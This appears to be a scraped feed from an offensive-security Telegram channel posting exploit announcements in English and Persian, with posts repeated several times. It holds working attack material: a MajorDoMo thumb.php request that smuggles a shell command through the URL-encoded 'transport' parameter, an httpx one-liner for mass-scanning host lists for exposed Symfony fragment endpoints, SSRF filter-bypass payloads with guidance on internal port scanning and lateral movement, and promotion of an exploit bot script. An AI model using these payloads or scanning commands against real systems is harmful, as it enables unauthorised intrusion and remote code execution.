CVE-2024-26630
Linux 6.5 Kernel Pointer Leak ❗️
Link
#Cve #linux #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Linux 6.5 Kernel Pointer Leak ❗️
Link
#Cve #linux #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2⚡1
MajorDoMo thumb RCE
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3❤🔥2
🔥7
Exploits Symfony
httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Github
#Exploit #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Github
#Exploit #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤3
Zero Exploiter 🔥 Bot Exploit 💎
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
🔥7❤2👍1👏1
0Day.Today | Learn Exploit | Zero World | Dark web |
Zero Exploiter 🔥 Bot Exploit 💎 Share and subscribe Made with ❤️ #Priv8 #Exploit —————— 0Day.Today @LearnExploit @A3L3_KA4
ZeroExploiter.py
4 KB
Zero Exploiter 🔥 Bot Exploit 💎
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
🔥7❤3👍2
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
Version:
Tested on OS: Microsoft Windows 10 pro x64
🕷 Exploit-db
⬇️ Download
#Exploit #ESET #NOD32
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
https://www.eset.comVersion:
17.0.16.0Tested on OS: Microsoft Windows 10 pro x64
#Exploit #ESET #NOD32
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6❤3👍3🔥2❤🔥1
SSRF Payloads To Bypass Firewall
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
http://127.127.127.127
http://127.0.0.0
http://127.1
http://0
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
http://127.1.1.1:80\@127.2.2.2:80/
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
1) Bypass SSRF with CIDR:http://127.127.127.127
http://127.0.0.0
2) Bypass using rare address:http://127.1
http://0
3) Bypass using tricks combination:http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
4) Bypass against a weak parser:http://127.1.1.1:80\@127.2.2.2:80/
5) Bypass localhost with [:]:http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3
✅ Article introducing and exploiting 4 bugs
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
Article introducing and exploiting 4 bugs.pdf
376.6 KB
✅ Article introducing and exploiting 4 bugs
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
#exploit
1. CVE-2024-54887:
TP-Link TL-WR940N BoF
2. CVE-2024-41570:
Authenticated Havoc-Chained-RCE
3. CVE-2025-21298:
Windows OLE RCE (CVSS 9.8)
IR0Day.Today Bax
@LearnExploit
1. CVE-2024-54887:
TP-Link TL-WR940N BoF
2. CVE-2024-41570:
Authenticated Havoc-Chained-RCE
3. CVE-2025-21298:
Windows OLE RCE (CVSS 9.8)
IR0Day.Today Bax
@LearnExploit
Medium
Reversing, Discovering, And Exploiting A TP-Link Router Vulnerability — CVE-2024–54887
Overview
👍4❤1
وقتی HarmonyOS هک میشود! تست تهاجمی اپهای HarmonyOS NEXT با Harm0nyz3r
در این ارائه، امنیت HarmonyOS NEXT بهصورت عملی زیر ذرهبین رفته؛ جایی که با استفاده از فریمورک اختصاصی Harm0nyz3r و اپلیکیشن آسیبپذیر DVHA، سطح حمله اپها شناسایی شده و اکسپلویتها بهصورت زنده اجرا میشن. نگاهی واقعی به تهدیدات، ضعفها و آینده امنیت اکوسیستم HarmonyOS.
⸻
#HarmonyOS
#HarmonyOS_NEXT
#Mobile_Security
#Offensive_Security
#BlackHat2025
#AppSec
#Pentest
#ReverseEngineering
#Exploit
⸻
@LearnExploit
@IR0DayBax
در این ارائه، امنیت HarmonyOS NEXT بهصورت عملی زیر ذرهبین رفته؛ جایی که با استفاده از فریمورک اختصاصی Harm0nyz3r و اپلیکیشن آسیبپذیر DVHA، سطح حمله اپها شناسایی شده و اکسپلویتها بهصورت زنده اجرا میشن. نگاهی واقعی به تهدیدات، ضعفها و آینده امنیت اکوسیستم HarmonyOS.
⸻
#HarmonyOS
#HarmonyOS_NEXT
#Mobile_Security
#Offensive_Security
#BlackHat2025
#AppSec
#Pentest
#ReverseEngineering
#Exploit
⸻
@LearnExploit
@IR0DayBax
Breaking_Harmony_NEXT.pdf
12.2 MB
وقتی HarmonyOS هک میشود! تست تهاجمی اپهای HarmonyOS NEXT با Harm0nyz3r
در این ارائه، امنیت HarmonyOS NEXT بهصورت عملی زیر ذرهبین رفته؛ جایی که با استفاده از فریمورک اختصاصی Harm0nyz3r و اپلیکیشن آسیبپذیر DVHA، سطح حمله اپها شناسایی شده و اکسپلویتها بهصورت زنده اجرا میشن. نگاهی واقعی به تهدیدات، ضعفها و آینده امنیت اکوسیستم HarmonyOS.
⸻
#HarmonyOS
#HarmonyOS_NEXT
#Mobile_Security
#Offensive_Security
#BlackHat2025
#AppSec
#Pentest
#ReverseEngineering
#Exploit
⸻
@LearnExploit
@IR0DayBax
در این ارائه، امنیت HarmonyOS NEXT بهصورت عملی زیر ذرهبین رفته؛ جایی که با استفاده از فریمورک اختصاصی Harm0nyz3r و اپلیکیشن آسیبپذیر DVHA، سطح حمله اپها شناسایی شده و اکسپلویتها بهصورت زنده اجرا میشن. نگاهی واقعی به تهدیدات، ضعفها و آینده امنیت اکوسیستم HarmonyOS.
⸻
#HarmonyOS
#HarmonyOS_NEXT
#Mobile_Security
#Offensive_Security
#BlackHat2025
#AppSec
#Pentest
#ReverseEngineering
#Exploit
⸻
@LearnExploit
@IR0DayBax